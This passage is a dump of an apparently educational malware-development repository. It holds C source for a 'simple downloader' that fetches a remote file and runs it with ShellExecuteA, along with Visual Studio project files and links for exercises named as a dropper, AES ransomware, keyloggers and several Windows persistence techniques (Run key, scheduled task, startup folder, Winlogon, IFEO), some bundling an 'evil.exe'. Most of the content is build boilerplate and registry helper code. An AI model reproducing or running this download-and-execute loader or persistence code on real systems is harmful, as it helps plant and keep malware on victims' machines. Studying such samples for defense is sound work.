12 | ** https://stackoverflow.com/a/5185008
13 | */
14 |
15 | int main()
16 | {
17 | TCHAR url[] = TEXT("http://github.com/fluidicon.png");
18 | TCHAR filePath[MAX_PATH];
19 |
20 | // Current working directory
21 | GetCurrentDirectoryA(MAX_PATH, filePath);
22 |
23 | // Format path to save downloaded file
24 | wsprintfA(filePath, TEXT("%s\\fluidicon.png"), filePath);
25 |
26 | // Download file from url
27 | HRESULT hRes = URLDownloadToFileA(NULL, url, filePath, 0, NULL);
28 | Sleep(400);
29 |
30 | // Print result
31 | if (hRes == S_OK) {
32 | printf(" [+] File download successfully.\n");
33 | Sleep(400);
34 | printf(" [+] Saved to: %s\n", filePath);
35 | Sleep(400);
36 | printf(" [+] Executing file dropped..!");
37 | Sleep(400);
38 | // Open file downloaded using ShellExecuteA() API.
39 | ShellExecuteA(NULL, "open", filePath, NULL, NULL, 1);
40 | }
41 | else if (hRes == E_OUTOFMEMORY) {
42 | printf(" [-] The buffer length is invalid.\n");
43 | }
44 | else if (hRes == INET_E_DOWNLOAD_FAILURE) {
45 | printf(" [-] The specified resource or callback interface was invalid.\n");
46 | }
47 | else {
48 | printf(" [-] Unknown Error!\n");
49 | }
50 |
51 | return 0;
52 | }
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex13_Simple_Downloader/Ex13_Simple_Downloader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex13_Simple_Downloader/Ex13_Simple_Downloader.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/Ex14_Simple_Dropper.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex14_Simple_Dropper/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/fluidicon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex14_Simple_Dropper/fluidicon.png
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex14_Simple_Dropper/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex14_Simple_Dropper.rc
4 | //
5 | #define IDB_PNG1 101
6 | #define IDR_BIN1 102
7 |
8 | // Next default values for new objects
9 | //
10 | #ifdef APSTUDIO_INVOKED
11 | #ifndef APSTUDIO_READONLY_SYMBOLS
12 | #define _APS_NEXT_RESOURCE_VALUE 103
13 | #define _APS_NEXT_COMMAND_VALUE 40001
14 | #define _APS_NEXT_CONTROL_VALUE 1001
15 | #define _APS_NEXT_SYMED_VALUE 101
16 | #endif
17 | #endif
18 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex15_Simple_Ransomware_AES128/Ex15_Simple_Ransomware_AES128.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex15_Simple_Ransomware_AES128/Ex15_Simple_Ransomware_AES128.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.txt
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex16_Simple_Keylogger1/Ex16_Simple_Keylogger1.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex17_Simple_Keylogger2/Ex17_Simple_Keylogger2.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex17_Simple_Keylogger2/Ex17_Simple_Keylogger2.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/Ex18_1_Persistence_Run_Registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/MyRegistry.c:
--------------------------------------------------------------------------------
1 | #include "MyRegistry.h"
2 |
3 | /*
4 | * Example to used:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
31 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
32 | {
33 | DWORD dwDisposition; // It verify new key is created or open existing key
34 | HKEY hKey;
35 | DWORD Ret;
36 |
37 | Ret = RegCreateKeyEx(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
38 | if (Ret != ERROR_SUCCESS) {
39 | printf(" [-] Error Opening or Creating new key. Code = %d\n", GetLastError());
40 | return FALSE;
41 | }
42 | //close the key
43 | RegCloseKey(hKey);
44 | return TRUE;
45 | }
46 |
47 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
48 | {
49 | DWORD Ret;
50 | HKEY hKey;
51 | // Open the key
52 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
53 | if (Ret == ERROR_SUCCESS) {
54 | // Set the value in key
55 | if (ERROR_SUCCESS != RegSetValueEx(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data))) {
56 | RegCloseKey(hKey);
57 | return FALSE;
58 | }
59 | // Close the key
60 | RegCloseKey(hKey);
61 | return TRUE;
62 | }
63 | return FALSE;
64 | }
65 |
66 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
67 | {
68 | DWORD Ret;
69 | HKEY hKey;
70 | // Open the key
71 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
72 | if (Ret == ERROR_SUCCESS) {
73 | if (ERROR_SUCCESS != RegSetValueEx(hKey, valueName, 0, REG_SZ, (LPBYTE)(strData), ((((DWORD)lstrlen(strData) + 1)) * 2))) {
74 | RegCloseKey(hKey);
75 | return FALSE;
76 | }
77 | RegCloseKey(hKey);
78 | return TRUE;
79 | }
80 | return FALSE;
81 | }
82 |
83 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData)
84 | {
85 | HKEY hKey;
86 | DWORD Ret;
87 | // Check if the registry exists
88 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey);
89 | if (Ret == ERROR_SUCCESS) {
90 | DWORD data;
91 | DWORD len = sizeof(DWORD); // size of data
92 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (LPBYTE)(&data), &len);
93 | if (Ret == ERROR_SUCCESS) {
94 | RegCloseKey(hKey);
95 | (*readData) = data;
96 | return TRUE;
97 | }
98 | RegCloseKey(hKey);
99 | return TRUE;
100 | }
101 | else {
102 | return FALSE;
103 | }
104 | }
105 |
106 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData)
107 | {
108 | // Read customer infromation from the registry
109 | HKEY hKey;
110 | DWORD len = TOTAL_BYTES_READ;
111 | DWORD readDataLen = len;
112 | PWCHAR readBuffer = (PWCHAR)malloc(sizeof(PWCHAR)* len);
113 |
114 | if (readBuffer == NULL)
115 | return FALSE;
116 | // Check if the registry exists
117 | DWORD Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey);
118 | if (Ret == ERROR_SUCCESS) {
119 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
120 | while (Ret == ERROR_MORE_DATA)
121 | {
122 | // Get a buffer that is big enough.
123 | len += OFFSET_BYTES;
124 | readBuffer = (PWCHAR)realloc(readBuffer, len);
125 | readDataLen = len;
126 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
127 | }
128 | if (Ret != ERROR_SUCCESS) {
129 | RegCloseKey(hKey);
130 | return FALSE;;
131 | }
132 | *readData = readBuffer;
133 | RegCloseKey(hKey);
134 | return TRUE;
135 | }
136 | else {
137 | return FALSE;
138 | }
139 | }
140 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/MyRegistry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 |
6 | #define TOTAL_BYTES_READ 1024
7 | #define OFFSET_BYTES 1024
8 |
9 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
10 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
11 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
12 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
13 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_1_Persistence_Run_Registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_1_Persistence_Run_Registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/Ex18_2_Persistence_Scheduled_Task.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_2_Persistence_Scheduled_Task/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_2_Persistence_Scheduled_Task.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/Ex18_3_Persistence_Startup_Folder.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_3_Persistence_Startup_Folder/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_3_Persistence_Startup_Folder.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/Ex18_4_Persistence_Winlogon_Registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/MyRegistry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 |
6 | #define TOTAL_BYTES_READ 1024
7 | #define OFFSET_BYTES 1024
8 |
9 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
10 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
11 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
12 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
13 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/RegBak/Winlogon.reg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/RegBak/Winlogon.reg
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_4_Persistence_Winlogon_Registry/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_4_Persistence_Winlogon_Registry.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/Ex18_5_Persistence_IFEO.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/MyRegistry.c:
--------------------------------------------------------------------------------
1 | #include "MyRegistry.h"
2 |
3 | /*
4 | * Example to used:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
31 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
32 | {
33 | DWORD dwDisposition; // It verify new key is created or open existing key
34 | HKEY hKey;
35 | DWORD Ret;
36 |
37 | Ret = RegCreateKeyEx(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
38 | if (Ret != ERROR_SUCCESS) {
39 | RegCloseKey(hKey);
40 | return FALSE;
41 | }
42 | // close the key
43 | RegCloseKey(hKey);
44 | return TRUE;
45 | }
46 |
47 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
48 | {
49 | DWORD Ret;
50 | HKEY hKey;
51 | // Open the key
52 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
53 | if (Ret == ERROR_SUCCESS) {
54 | // Set the value in key
55 | if (ERROR_SUCCESS != RegSetValueEx(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data))) {
56 | RegCloseKey(hKey);
57 | return FALSE;
58 | }
59 | // Close the key
60 | RegCloseKey(hKey);
61 | return TRUE;
62 | }
63 | return FALSE;
64 | }
65 |
